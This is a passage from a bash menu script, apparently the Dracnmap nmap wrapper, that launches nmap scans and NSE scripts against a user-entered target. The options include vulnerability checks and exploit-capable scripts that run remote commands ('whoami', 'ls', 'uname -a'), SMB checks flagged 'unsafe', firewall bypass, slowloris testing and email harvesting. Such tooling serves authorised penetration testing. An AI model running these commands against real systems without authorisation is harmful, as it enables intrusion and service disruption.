  2257. $urxvt --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' $ip &
  2258. elif test $vuln == '42'
  2259. then
  2260. echo
  2261. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2262. read ip
  2263. $urxvt --script http-vuln-cve2010-2861 $ip &
  2264. elif test $vuln == '43'
  2265. then
  2266. echo
  2267. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2268. read ip
  2269. $urxvt --script http-vuln-cve2011-3192.nse [--script-args] -pT:80,443 $ip &
  2270. elif test $vuln == '44'
  2271. then
  2272. echo
  2273. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2274. read ip
  2275. $urxvt --script http-vuln-cve2011-3368 $ip &
  2276. elif test $vuln == '45'
  2277. then
  2278. echo
  2279. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2280. read ip
  2281. $urxvt -sV --script http-vuln-cve2012-1823 $ip &
  2282. elif test $vuln == '46'
  2283. then
  2284. echo
  2285. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2286. read ip
  2287. $urxvt -sV --script http-vuln-cve2013-0156 $ip &
  2288. elif test $vuln == '47'
  2289. then
  2290. echo
  2291. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2292. read ip
  2293. $urxvt -p80 --script http-rompager-xss $ip &
  2294. elif test $vuln == '48'
  2295. then
  2296. echo
  2297. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2298. read ip
  2299. $urxvt -p80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra $ip &
  2300. elif test $vuln == '49'
  2301. then
  2302. echo
  2303. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2304. read ip
  2305. $urxvt -p 443 --script http-vuln-cve2014-2126 $ip &
  2306. elif test $vuln == '50'
  2307. then
  2308. echo
  2309. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2310. read ip
  2311. $urxvt -p 443 --script http-vuln-cve2014-2127 $ip &
  2312. elif test $vuln == '51'
  2313. then
  2314. echo
  2315. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2316. read ip
  2317. $urxvt -p 443 --script http-vuln-cve2014-2128 $ip &
  2318. elif test $vuln == '52'
  2319. then
  2320. echo
  2321. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2322. read ip
  2323. $urxvt -p 443 --script http-vuln-cve2014-2129 $ip &
  2324. elif test $vuln == '53'
  2325. then
  2326. echo
  2327. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2328. read ip
  2329. $urxvt --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false $ip &
  2330. elif test $vuln == '54'
  2331. then
  2332. echo
  2333. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2334. read ip
  2335. $urxvt --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" $ip &
  2336. elif test $vuln == '55'
  2337. then
  2338. echo
  2339. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2340. read ip
  2341. $urxvt --script=http-vuln-cve2015-1427 --script-args command= 'ls' $ip &
  2342. elif test $vuln == '56'
  2343. then
  2344. echo
  2345. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2346. read ip
  2347. $urxvt -sV --script http-vuln-cve2015-1635 --script-args uri='/anotheruri/' $ip &
  2348. elif test $vuln == '57'
  2349. then
  2350. echo
  2351. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2352. read ip
  2353. $urxvt $ip -p 7547 --script=http-vuln-misfortune-cookie &
  2354. elif test $vuln == '58'
  2355. then
  2356. echo
  2357. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2358. read ip
  2359. $urxvt -sV --script http-vuln-wnr1000-creds $ip -p 80 &
  2360. elif test $vuln == '59'
  2361. then
  2362. echo
  2363. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2364. read ip
  2365. $urxvt -sV --script http-wordpress-users --script-args limit=50 $ip &
  2366. elif test $vuln == '60'
  2367. then
  2368. echo
  2369. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2370. read ip
  2371. $urxvt -sU --script ipmi-cipher-zero -p 623 $ip &
  2372. elif test $vuln == '61'
  2373. then
  2374. echo
  2375. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2376. read ip
  2377. $urxvt -p 6667 --script=irc-botnet-channels $ip &
  2378. elif test $vuln == '62'
  2379. then
  2380. echo
  2381. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2382. read ip
  2383. $urxvt -sV --script=irc-unrealircd-backdoor $ip &
  2384. elif test $vuln == '63'
  2385. then
  2386. echo
  2387. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2388. read ip
  2389. $urxvt -sV --script mysql-vuln-cve2012-2122 $ip &
  2390. elif test $vuln == '64'
  2391. then
  2392. echo
  2393. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2394. read ip
  2395. $urxvt -p 12345 --script netbus-auth-bypass $ip &
  2396. elif test $vuln == '65'
  2397. then
  2398. echo
  2399. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2400. read ip
  2401. $urxvt --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p $port $ip &
  2402. elif test $vuln == '66'
  2403. then
  2404. echo
  2405. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2406. read ip
  2407. $urxvt -sV --script=rdp-ms12-020 -p 3389 $ip &
  2408. elif test $vuln == '67'
  2409. then
  2410. echo
  2411. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2412. read ip
  2413. $urxvt --script=rmi-vuln-classloader -p 1099 $ip &
  2414. elif test $vuln == '68'
  2415. then
  2416. echo
  2417. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2418. read ip
  2419. $urxvt --script=samba-vuln-cve-2012-1182 -p 139 $ip &
  2420. elif test $vuln == '69'
  2421. then
  2422. echo
  2423. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2424. read ip
  2425. $urxvt -sU --script smb-vuln-conficker.nse -p T:139 $ip &
  2426. elif test $vuln == '70'
  2427. then
  2428. echo
  2429. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2430. read ip
  2431. $urxvt -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 $ip &
  2432. elif test $vuln == '71'
  2433. then
  2434. echo
  2435. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2436. read ip
  2437. $urxvt -sU --script smb-vuln-ms06-025.nse -p U:137,T:139 $ip &
  2438. elif test $vuln == '72'
  2439. then
  2440. echo
  2441. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2442. read ip
  2443. $urxvt -sU --script smb-vuln-ms07-029.nse -p U:137,T:139 $ip &
  2444. elif test $vuln == '73'
  2445. then
  2446. echo
  2447. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2448. read ip
  2449. $urxvt -sU --script smb-vuln-ms08-067.nse -p U:137 $ip &
  2450. elif test $vuln == '74'
  2451. then
  2452. echo
  2453. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2454. read ip
  2455. $urxvt -p 445 $ip --script=smb-vuln-ms10-054 --script-args unsafe &
  2456. elif test $vuln == '75'
  2457. then
  2458. echo
  2459. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2460. read ip
  2461. $urxvt -p 445 $ip --script=smb-vuln-ms10-061 &
  2462. elif test $vuln == '76'
  2463. then
  2464. echo
  2465. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2466. read ip
  2467. $urxvt -sU --script smb-vuln-regsvc-dos.nse -p U:137,T:139 $ip &
  2468. elif test $vuln == '77'
  2469. then
  2470. echo
  2471. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2472. read ip
  2473. $urxvt --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 $ip &
  2474. elif test $vuln == '78'
  2475. then
  2476. echo
  2477. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2478. read ip
  2479. $urxvt --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=<domain>' -pT:25,465,587 $ip &
  2480. elif test $vuln == '79'
  2481. then
  2482. echo
  2483. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2484. read ip
  2485. $urxvt --script=smtp-vuln-cve2011-1764 -pT:25,465,587 $ip &
  2486. elif test $vuln == '80'
  2487. then
  2488. echo
  2489. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2490. read ip
  2491. $urxvt -p 443 --script ssl-ccs-injection $ip &
  2492. elif test $vuln == '81'
  2493. then
  2494. echo
  2495. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2496. read ip
  2497. $urxvt -p 443 --script ssl-cert-intaddr $ip &
  2498. elif test $vuln == '82'
  2499. then
  2500. echo
  2501. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2502. read ip
  2503. $urxvt --script ssl-dh-params $ip &
  2504. elif test $vuln == '83'
  2505. then
  2506. echo
  2507. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2508. read ip
  2509. $urxvt -p 443 --script ssl-heartbleed $ip &
  2510. elif test $vuln == '84'
  2511. then
  2512. echo
  2513. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2514. read ip
  2515. $urxvt --script ssl-known-key -p 443 $ip &
  2516. elif test $vuln == '85'
  2517. then
  2518. echo
  2519. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2520. read ip
  2521. $urxvt -sV --version-light --script ssl-poodle -p 443 $ip &
  2522. elif test $vuln == '86'
  2523. then
  2524. echo
  2525. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2526. read ip
  2527. $urxvt -sV --script=sslv2-drown $ip &
  2528. elif test $vuln == '87'
  2529. then
  2530. echo
  2531. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2532. read ip
  2533. $urxvt -p49152 --script supermicro-ipmi-conf $ip &
  2534. elif test $vuln == '88'
  2535. then
  2536. echo
  2537. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2538. read ip
  2539. $urxvt -sU -p 17185 --script wdb-version $ip &
  2540. elif test $vuln == '89'
  2541. then
  2542. nse
  2543. else
  2544. echo ""
  2545. echo -e $okegreen " Incorrect Number"
  2546. fi
  2547. echo ""
  2548. echo ""
  2549. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  2550. read back
  2551. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  2552. then
  2553. clear
  2554. menu
  2555. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  2556. then
  2557. vuln
  2558. fi
  2559. }
  2562. function nse () {
  2563. clear
  2564. echo -e $okegreen " "
  2565. echo " ) * ( ( ( ( ( ";
  2566. echo " ( /( ( \ ( )\ ) )\ ) ( )\ ))\ ))\ ) * ) ";
  2567. echo " )\()))\))( )\ (()/( (()/( )\ (()/(()/(()/(\ ) /( ";
  2568. echo "((_)\((_)()((((_)( /(_)) /(_)|((_) /(_))(_))(_))( )(_)) ";
  2569. echo " _((_|_()((_)\ _ )\(_)) (_)) )\___(_))(_))(_)) (_(_()) ";
  2570. echo "| \| | \/ (_)_\(_) _ \ / __((/ __| _ \_ _| _ \|_ _| ";
  2571. echo "| .\ | |\/| |/ _ \ | _/ \__ \| (__| /| || _/ | | ";
  2572. echo "|_|\_|_| |_/_/ \_\|_| |___/ \___|_|_\___|_| |_| ";
  2573. echo " ";
  2574. echo -e $red" Nmap Script Engine - Advanced Scanning with Nmap Script "
  2576. echo -e $white " "
  2577. echo -e $white" [$okegreen"01"$white]$cyan auth-category "
  2578. echo -e $white" [$okegreen"02"$white]$cyan broadcast-category "
  2579. echo -e $white" [$okegreen"03"$white]$cyan brute-category "
  2580. echo -e $white" [$okegreen"04"$white]$cyan exploit-category "
  2581. echo -e $white" [$okegreen"05"$white]$cyan fuzzer-category "
  2582. echo -e $white" [$okegreen"06"$white]$cyan malware-category "
  2583. echo -e $white" [$okegreen"07"$white]$cyan vuln-category "
  2584. echo -e $white" [$okegreen"08"$white]$cyan back to menu "
  2585. echo
  2586. echo -n -e $red' \033[4mScreetsec@nse:\033[0m>> '; tput sgr0 #insert your choice
  2587. read ceh
  2588. if test $ceh == '1'
  2589. then
  2590. clear
  2591. auth
  2592. elif test $ceh == '2'
  2593. then
  2594. clear
  2595. brd
  2596. elif test $ceh == '3'
  2597. then
  2598. clear
  2599. brutense
  2600. elif test $ceh == '4'
  2601. then
  2602. clear
  2603. exploit
  2604. elif test $ceh == '5'
  2605. then
  2606. clear
  2607. fuzzer
  2608. elif test $ceh == '6'
  2609. then
  2610. echo
  2611. clear
  2612. malware
  2613. elif test $ceh == '7'
  2614. then
  2615. echo
  2616. clear
  2617. vuln
  2618. elif test $ceh == '8'
  2619. then
  2620. menu
  2621. else
  2622. echo ""
  2623. echo -e $okegreen " Incorrect Number"
  2624. fi
  2625. echo ""
  2626. echo ""
  2627. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  2628. read back
  2629. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  2630. then
  2631. clear
  2632. menu
  2633. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  2634. then
  2635. nse
  2636. fi
  2637. }
  2639. ################################################
  2641. ################################################
  2642. function pingbebeb() {
  2643. echo -e $okegreen " "
  2644. clear
  2645. echo " "
  2646. echo " "
  2647. echo ""
  2648. echo " \|/ "
  2649. echo " .-*- "
  2650. echo " / /|\ "
  2651. echo " _L_ "
  2652. echo " , . "
  2653. echo -e $okegreen" (\ / O O \ /) $red ______ _______ _______ _______ __ __ "
  2654. echo -e $okegreen" \| _ |/ $red | __ \_ _| | | __| | | | "
  2655. echo -e $okegreen" \ (_) / $red | __/_| |_| | | | |__|__| "
  2656. echo -e $okegreen" _/.___,\_ $red |___| |_______|__|____|_______| |__|__| "
  2657. echo -e $okegreen" (_/ alf \_) "
  2658. echo -e $white " "
  2659. echo -e $white" [$okegreen"01"$white]$cyan BROADCAST PING "
  2660. echo -e $white" [$okegreen"02"$white]$cyan TCP SYN PING SCANS "
  2661. echo -e $white" [$okegreen"03"$white]$cyan TCP ACK PING SCANS "
  2662. echo -e $white" [$okegreen"04"$white]$cyan UDP PING SCANS "
  2663. echo -e $white" [$okegreen"05"$white]$cyan ICMP PING SCANS "
  2664. echo -e $white" [$okegreen"06"$white]$cyan IP PROTOCOL PING SCANS "
  2665. echo -e $white" [$okegreen"07"$white]$cyan BACK "
  2666. echo -e " "
  2667. echo -n -e $red' \033[4mScreetsec@PING!:\033[0m>> '; tput sgr0 #insert your choice
  2668. read DrS
  2670. if test $DrS == '1'
  2671. then
  2672. echo -e $cyan""
  2673. echo -n " What is your IP Target or Host: " ; tput sgr0
  2674. read ip
  2675. $urxvt --script broadcast-ping --script-args broadcast-ping.num_probes=5 $ip &
  2676. pingbebeb
  2677. elif test $DrS == '2'
  2678. then
  2679. echo -e $cyan""
  2680. echo -n " What is your IP Target or Host: " ; tput sgr0
  2681. read ip
  2682. $urxvt -sP -PS $ip &
  2683. pingbebeb
  2684. elif test $DrS == '3'
  2685. then
  2686. echo -e $cyan""
  2687. echo -n " What is your IP Target or Host: " ; tput sgr0
  2688. read ip
  2689. $urxvt -sP -PA $ip &
  2690. pingbebeb
  2691. elif test $DrS == '4'
  2692. then
  2693. echo -e $cyan""
  2694. echo -n " What is your IP Target or Host: " ; tput sgr0
  2695. read ip
  2696. $urxvt -sP -PU $ip &
  2697. pingbebeb
  2698. elif test $DrS == '5'
  2699. then
  2700. echo -e $cyan""
  2701. echo -n " What is your IP Target or Host: " ; tput sgr0
  2702. read ip
  2703. $urxvt -sP -PE $ip &
  2704. pingbebeb
  2705. elif test $DrS == '6'
  2706. then
  2707. echo -e $cyan""
  2708. echo -n " What is your IP Target or Host: " ; tput sgr0
  2709. read ip
  2710. $urxvt -sP -PO --packet-trace $ip &
  2711. pingbebeb
  2712. elif test $DrS == '7'
  2713. then
  2714. menu
  2715. else
  2716. echo ""
  2717. echo -e $okegreen " Incorrect Number"
  2718. fi
  2719. echo ""
  2720. echo ""
  2721. echo -n -e $cyan " Back to Last Menu? ( Yes / No ) :"
  2722. read back
  2723. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  2724. then
  2725. clear
  2726. menu
  2727. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  2728. then
  2729. pingbebeb
  2730. fi
  2731. }
  2735. ###############################################
  2736. # ZENMAP
  2737. ###############################################
  2738. function zenmapscript() {
  2739. clear
  2740. clear
  2741. echo ""
  2742. echo -e $okegreen" ===================================================================="
  2743. echo -e $cyan""
  2744. echo " +--^----------,--------,-----,--------^-, "
  2745. echo -e " | $red ||||||||| -------- | O "
  2746. echo -e $cyan" +---------------------------^----------| "
  2747. echo -e $cyan" \_,---------,---------,--------------' "
  2748. echo -e " / $red"XXXXXX"$cyan /'| /' "
  2749. echo -e " / $red"XXXXXX"$cyan / \ /' "
  2750. echo -e " / $red"XXXXXX"$cyan / _______/ "
  2751. echo -e " / $red"XXXXXX"$cyan / "
  2752. echo -e " / $red"XXXXXX"$cyan / "
  2753. echo " (________( "
  2754. echo -e " ------' $red DOUBLE KILL !! GO GO GO !! "
  2755. echo ""
  2756. echo -e $okegreen" ====================================================================="
  2757. echo -e $cyan " Scanning Target with $red'advanced command ( Zenmap Command ) "
  2758. echo -e $okegreen" ====================================================================="
  2759. echo ""
  2760. echo ""
  2761. echo -e $white" [$okegreen"01"$white]$cyan ITENSE SCAN"
  2762. echo -e $white" [$okegreen"02"$white]$cyan ITENSE SCAN + UDP "
  2763. echo -e $white" [$okegreen"03"$white]$cyan ITENSE SCAN ALL TCP PORTS "
  2764. echo -e $white" [$okegreen"04"$white]$cyan QUICK SCAN "
  2765. echo -e $white" [$okegreen"05"$white]$cyan QUICK SCAN PLUS PLUS "
  2766. echo -e $white" [$okegreen"06"$white]$cyan QUICK TRACEROUT "
  2767. echo -e $white" [$okegreen"07"$white]$cyan COMPREHENSIVE SCAN [BEST] "
  2768. echo -e $white" [$okegreen"08"$white]$cyan BACK "
  2769. echo -e " "
  2770. echo -n -e $red' \033[4mScreetsec@Headshot:\033[0m>> '; tput sgr0 #insert your choice
  2771. read Scanning
  2772. if test $Scanning == '1'
  2773. then
  2774. echo
  2775. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2776. read ip
  2777. $urxvt -T4 -A -v $ip &
  2778. elif test $Scanning == '2'
  2779. then
  2780. echo
  2781. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2782. read ip
  2783. $urxvt -sS -sU -T4 -A -v $ip &
  2784. elif test $Scanning == '3'
  2785. then
  2786. echo
  2787. echo -ne $okegreen" What is your IP Target or Host: " ; tput sgr0
  2788. read ip
  2789. $urxvt -p 1-65535 -T4 -A -v $ip &
  2790. elif test $Scanning == '4'
  2791. then
  2792. echo
  2793. echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
  2794. read ip
  2795. $urxvt -T4 -F $ip &
  2796. elif test $Scanning == '5'
  2797. then
  2798. echo
  2799. echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
  2800. read ip
  2801. $urxvt -sV -T4 -O -F --version-light $ip &
  2802. elif test $Scanning == '6'
  2803. then
  2804. echo
  2805. echo -ne $okegreen " What is your IP Target or Host: "; tput sgr0
  2806. read ip
  2807. $urxvt -sn --traceroute $ip &
  2808. elif test $Scanning == '7'
  2809. then
  2810. echo
  2811. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2812. read ip
  2813. $urxvt -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip &
  2814. elif test $Scanning == '8'
  2815. then
  2816. menu
  2817. else
  2818. echo ""
  2819. echo -e $okegreen " Incorrect Number"
  2820. fi
  2821. echo ""
  2822. echo ""
  2823. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  2824. read back
  2825. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  2826. then
  2827. clear
  2828. menu
  2829. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  2830. then
  2831. zenmapscript
  2832. fi
  2833. }
  2835. ################################################
  2837. ################################################
  2838. function WebService() {
  2839. clear
  2840. echo -e $cyan ""
  2841. echo ""
  2842. echo -e $red " __ __ ___. _________ .__ ";
  2843. echo "/ \ / \ ____\_ |__ / _____/ ______________ _|__| ____ ____ ";
  2844. echo "\ \/\/ // __ \| __ \ \_____ \_/ __ \_ __ \ \/ / |/ ___\/ __ \ ";
  2845. echo " \ /\ ___/| \_\ \ / \ ___/| | \/\ /| \ \__\ ___/ ";
  2846. echo " \__/\ / \___ >___ / /_______ /\___ >__| \_/ |__|\___ >___ >";
  2847. echo -e $okegreen
  2848. echo " -----------------------------------------------------------------------"
  2849. echo ""
  2850. echo -e $white" [$okegreen"01"$white]$cyan DETECTING WEB APPLICATION FIREWALLS "
  2851. echo -e $white" [$okegreen"02"$white]$cyan DETECTING POSSIBLE XST VULNERABILITIES "
  2852. echo -e $white" [$okegreen"03"$white]$cyan DETECTING OPEN RELAYS "
  2853. echo -e $white" [$okegreen"04"$white]$cyan DETECTING BACKDOOR SMTP SERVERS "
  2854. echo -e $white" [$okegreen"05"$white]$cyan DETECTING CROSS SITE SCRIPTING VULNERABILITIES "
  2855. echo -e $white" [$okegreen"06"$white]$cyan ENUMERATING USERS IN AN SMTP SERVER "
  2856. echo -e $white" [$okegreen"07"$white]$cyan DETECTING WEB SERVERS VULNERABLE TO SLOWLORIS DDOS "
  2857. echo -e $white" [$okegreen"08"$white]$cyan FINDING SQL INJECTION VULNERABILITIES "
  2858. echo -e $white" [$okegreen"09"$white]$cyan CHECK IP GEOLOCATION WITH NSE "
  2859. echo -e $white" [$okegreen"10"$white]$cyan GATHERING INFORMATION FROM WHOIS (NSE) "
  2860. echo -e $white" [$okegreen"11"$white]$cyan COLLECTING VALID EMAIL ADDRES "
  2861. echo -e $white" [$okegreen"12"$white]$cyan BACK "
  2862. echo -e " "
  2863. echo -n -e $red' \033[4mScreetsec@WebService:\033[0m>> '; tput sgr0 #insert your choice
  2864. read Scanning
  2865. if test $Scanning == '1'
  2866. then
  2867. echo
  2868. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2869. read ip
  2870. $urxvt --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 $ip &
  2871. elif test $Scanning == '2'
  2872. then
  2873. echo
  2874. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2875. read ip
  2876. nmap -sS -sU -T4 -A -v $ip
  2877. $urxvt -p80 --script http-methods,http-trace --script-args http-methods.retest $ip &
  2878. elif test $Scanning == '3'
  2879. then
  2880. echo
  2881. echo -ne $okegreen" What is your IP Target or Host: " ; tput sgr0
  2882. read ip
  2883. $urxvt -sV --script smtp-open-relay -v $ip &
  2884. elif test $Scanning == '4'
  2885. then
  2886. echo
  2887. echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
  2888. read ip
  2889. $urxvt nmap -sn $ip
  2890. echo -e ""
  2891. $urxvt -sV --script smtp-strangeport $ip &
  2892. elif test $Scanning == '5'
  2893. then
  2894. echo
  2895. echo -ne $okegreen" What is your IP Target or Host: "; tput sgr0
  2896. read ip
  2897. $urxvt -p80 --script http-phpself-xss,http-unsafe-output-escaping $ip &
  2898. elif test $Scanning == '6'
  2899. then
  2900. echo
  2901. echo -ne $okegreen " What is your IP Target or Host: "; tput sgr0
  2902. read ip
  2903. $urxvt -p25 –script smtp-enum-users $ip &
  2904. elif test $Scanning == '7'
  2905. then
  2906. echo
  2907. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2908. read ip
  2909. $urxvt -p80 --script http-slowloris --max-parallelism 300 $ip &
  2910. elif test $Scanning == '8'
  2911. then
  2912. echo
  2913. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2914. read ip
  2915. $urxvt -p80 --script http-sql-injection $ip &
  2916. elif test $Scanning == '9'
  2917. then
  2918. echo
  2919. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2920. read ip
  2921. $urxvt -Pn -p80 --script ip-geolocation-* $ip &
  2922. elif test $Scanning == '10'
  2923. then
  2924. echo
  2925. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2926. read ip
  2927. $urxvt -sn --script whois-ip --script-args whois.whodb=nocache $ip &
  2928. elif test $Scanning == '11'
  2929. then
  2930. echo
  2931. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2932. read ip
  2933. $urxvt -p80 --script http-google-email,http-email-harvest $ip &
  2934. elif test $Scanning == '12'
  2935. then
  2936. menu
  2937. else
  2938. echo ""
  2939. echo -e $okegreen " Incorrect Number"
  2940. fi
  2941. echo ""
  2942. echo ""
  2943. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  2944. read back
  2945. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  2946. then
  2947. clear
  2948. menu
  2949. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  2950. then
  2951. WebService
  2952. fi
  2953. }
  2956. #######################################################
  2957. # CREDITS
  2958. #######################################################
  2959. function credits {
  2960. clear
  2961. echo -e "
  2962. \033[31m##########################################################################\033[m
  2963. Credits To
  2964. \033[31m##########################################################################\033[m"
  2965. echo
  2966. echo -e $white "Special thanks to:"
  2967. echo
  2968. echo -e $red "Dracos Linux ( )"
  2969. echo
  2970. echo -e $okegreen "Offensive Security for the awesome OS"
  2971. echo
  2972. echo -e $green ""
  2973. echo
  2974. echo -e $yellow ""
  2975. echo
  2976. echo -e $cyan ""
  2977. echo
  2978. echo -e $white ""
  2979. echo
  2980. echo -e $okegreen "My Friend for helpme ( Boy Suganda )"
  2981. echo
  2982. echo -e $red "Big Thanks to :"
  2983. echo
  2985. }
  2987. ###################################################
  2988. # Function Menu
  2989. #####################################################
  2990. function menu() {
  2991. clear
  2992. echo -e $red ""
  2993. echo " 80G08 "
  2994. echo " 8G#G@8 "
  2995. echo " 8##0 "
  2996. echo " 0##G8 "
  2997. echo " ####08 "
  2998. echo " 8#####8 "
  2999. echo " G#####8 "
  3000. echo " 8G#####8 "
  3001. echo " #8#########0 #######8 "
  3002. echo " 8#######0 0#88##### "
  3003. echo " 8G####8 8 8#8@@8### "
  3004. echo " 8### G8 8@G###### "
  3005. echo " 8##88 8 8######8 "
  3006. echo " G##088 80G##G080 "
  3007. echo " 88000000008880# 000 "
  3008. echo " 9 0 "
  3009. echo -e $okegreen" .___ _______ ";
  3010. echo " __| _/___________ ____ \ \ _____ _____ ______ ";
  3011. echo " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ ";
  3012. echo " / /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >";
  3013. echo " \____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ ";
  3014. echo " \/ \/ \/ \/ \/ \/|__| ";
  3015. echo ""
  3016. echo -e $cyan" Script by $white":" $red Edo Maland ( Screetsec ) "
  3017. echo -e $cyan" Version $white":" $red $Version "
  3018. echo -e $cyan" Codename $white":" $red $Codename "
  3019. echo -e $cyan" Follow me on Github $white":" $red @Screetsec "
  3020. echo -e $cyan" Dracos Linux $white":" $red "
  3021. echo -e $cyan ""
  3022. echo -e $okegreen" ========================================================= ";
  3023. echo -e $white " "
  3024. echo -e $white" [$okegreen"01"$white]$cyan REGULER SCAN "
  3025. echo -e $white" [$okegreen"02"$white]$cyan SCAN MULTIPLE IP ADDRESS "
  3026. echo -e $white" [$okegreen"03"$white]$cyan SCAN OS VERSION AND TRACEROUTE "
  3027. echo -e $white" [$okegreen"04"$white]$cyan FIND OUT IF A HOST IS PROTECTED FIREWALL "
  3028. echo -e $white" [$okegreen"05"$white]$cyan EVADING FIREWALLS "
  3029. echo -e $white" [$okegreen"06"$white]$cyan PING PING !! "
  3030. echo -e $white" [$okegreen"07"$white]$cyan WEB SERVICES"
  3031. echo -e $white" [$okegreen"08"$white]$cyan NMAP SCRIPT ENGINE - ADVANCED "
  3032. echo -e $white" [$okegreen"09"$white]$cyan ADVANCED NMAP SCANNINGS ( ZENMAP COMMAND ) "
  3033. echo -e $white" [$okegreen"10"$white]$cyan SCANNING TARGET WITH OUTPUT FILES"
  3034. echo -e $white" [$okegreen"11"$white]$cyan CREDITS "
  3035. echo -e $white" [$okegreen"12"$white]$cyan EXIT "
  3036. echo -e " "
  3037. echo -n -e $red' \033[4mScreetsec@dracmap-v2:\033[0m '; tput sgr0 #insert your choice
  3038. read Dracnmap
  3039. if test $Dracnmap == '1'
  3040. then
  3041. echo -e $cyan""
  3042. echo -ne " What is your IP Target or Host: " ; tput sgr0
  3043. read ip
